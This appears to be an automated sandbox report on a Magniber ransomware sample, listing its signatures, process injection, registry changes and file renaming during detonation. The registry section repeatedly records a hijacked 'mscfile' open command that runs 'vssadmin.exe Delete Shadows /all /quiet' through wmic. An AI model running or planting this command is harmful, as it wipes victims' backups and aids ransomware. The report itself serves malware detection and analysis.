Malware Analysis Report

2025-01-22 20:47

Sample ID 241206-eywkmszmc1
Target cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118
SHA256 b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9
Tags
magniber defense_evasion discovery execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b8509f34589fa23a5d2db7d84b70a351f8bf928a789b45f0f10168b48319ecb9

Threat Level: Known bad

The file cb0261d9a3e77ffecdb51914b3690f18_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

magniber defense_evasion discovery execution impact ransomware

Magniber family

Magniber Ransomware

Process spawned unexpected child process

Detect magniber ransomware

Renames multiple (62) files with added filename extension

Renames multiple (83) files with added filename extension

Deletes shadow copies

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Browser Information Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of UnmapMainImage

Opens file in notepad (likely ransom note)

Suspicious use of SetWindowsHookEx

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Interacts with shadow copies

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 04:21

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 04:21

Reported

2024-12-06 04:23

Platform

win7-20240708-en

Max time kernel

147s

Max time network

140s

Command Line

"taskhost.exe"

Signatures

Detect magniber ransomware

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Magniber Ransomware

ransomware magniber

Magniber family

magniber

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\cmd.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\vssadmin.exe

Deletes shadow copies

ransomware defense_evasion impact execution

Renames multiple (83) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini | C:\Windows\system32\DllHost.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\L2BFB2JG\desktop.ini | C:\Windows\system32\DllHost.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MYC3PENY\desktop.ini | C:\Windows\system32\DllHost.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9C9T5AL\desktop.ini | C:\Windows\system32\DllHost.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ROVWYKHE\desktop.ini | C:\Windows\system32\DllHost.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 2000 set thread context of 1124 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\taskhost.exe
PID 2000 set thread context of 1176 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\Dwm.exe
PID 2000 set thread context of 1272 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\Explorer.EXE
PID 2000 set thread context of 1228 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\DllHost.exe

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9010aa6d9647db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "439620768" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{974120B1-B389-11EF-98DB-E29800E22076} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = [value removed] | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000002aa6f01a5c1dec4887259b29e600834400000000020000000000106600000001000020000000caabd442e08e7a423e9f5a0662a88cc5a73aeec7ce3e757ce4806c83eeb5993d000000000e80000000020000200000009a347bf2f3967c8d28a7094423e36992baf0311bc8680e6d49748e4fd89007e82000000097be3dcc74b283f9a3a15604308a78e4183c00dd675d5b470f6d2739effeab8d4000000026e05953be2f6308720945ab2ae3f05da1eb50595cdba1d715e502050f5e1d7489fb0901190223fb5c7d08feba9a25b21507bbfcab0b923531bb394b691f08c0 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile | C:\Windows\system32\DllHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open | C:\Windows\system32\DllHost.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command | C:\Windows\system32\taskhost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command | C:\Windows\system32\Dwm.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | C:\Windows\system32\Dwm.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command | C:\Windows\system32\DllHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell | C:\Windows\system32\DllHost.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | C:\Windows\system32\DllHost.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command | C:\Windows\Explorer.EXE | N/A
Key created | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command | C:\Windows\system32\rundll32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | C:\Windows\system32\rundll32.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\"" | C:\Windows\system32\taskhost.exe | N/A

Opens file in notepad (likely ransom note)

ransomware
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\notepad.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A
N/A | N/A | C:\Windows\system32\rundll32.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: 33 | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: 34 | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: 35 | N/A | C:\Windows\system32\wbem\WMIC.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: 33 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: 34 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A
Token: 35 | N/A | C:\Windows\system32\wbem\wmic.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of UnmapMainImage

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\Explorer.EXE | N/A
N/A | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1228 wrote to memory of 1780 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\notepad.exe
PID 1228 wrote to memory of 1780 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\notepad.exe
PID 1228 wrote to memory of 1780 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\notepad.exe
PID 1228 wrote to memory of 2368 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2368 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2368 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 1880 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\wbem\wmic.exe
PID 1228 wrote to memory of 1880 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\wbem\wmic.exe
PID 1228 wrote to memory of 1880 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\wbem\wmic.exe
PID 1228 wrote to memory of 2516 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2516 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\cmd.exe
PID 1228 wrote to memory of 2516 | N/A | C:\Windows\system32\DllHost.exe | C:\Windows\system32\cmd.exe
PID 2516 wrote to memory of 1488 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 2516 wrote to memory of 1488 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 2516 wrote to memory of 1488 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 2368 wrote to memory of 380 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\Internet Explorer\iexplore.exe
PID 2368 wrote to memory of 380 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\Internet Explorer\iexplore.exe
PID 2368 wrote to memory of 380 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\Internet Explorer\iexplore.exe
PID 380 wrote to memory of 2756 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 380 wrote to memory of 2756 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 380 wrote to memory of 2756 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 380 wrote to memory of 2756 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 2892 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 2892 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 2892 wrote to memory of 2764 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 2764 wrote to memory of 1072 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2764 wrote to memory of 1072 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2764 wrote to memory of 1072 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 2472 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 2472 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 2472 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\wbem\wmic.exe
PID 1272 wrote to memory of 1920 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 1272 wrote to memory of 1920 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 1272 wrote to memory of 1920 | N/A | C:\Windows\Explorer.EXE | C:\Windows\system32\cmd.exe
PID 1920 wrote to memory of 2328 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 1920 wrote to memory of 2328 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 1920 wrote to memory of 2328 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 876 wrote to memory of 2572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 876 wrote to memory of 2572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 876 wrote to memory of 2572 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 2572 wrote to memory of 344 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2572 wrote to memory of 344 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2572 wrote to memory of 344 | N/A | C:\Windows\system32\CompMgmtLauncher.exe | C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1708 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1708 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1708 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\wbem\wmic.exe
PID 2000 wrote to memory of 1908 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1908 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 2000 wrote to memory of 1908 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\system32\cmd.exe
PID 1908 wrote to memory of 1576 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 1908 wrote to memory of 1576 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 1908 wrote to memory of 1576 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\wbem\WMIC.exe
PID 220 wrote to memory of 2816 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 220 wrote to memory of 2816 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
PID 220 wrote to memory of 2816 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\CompMgmtLauncher.exe
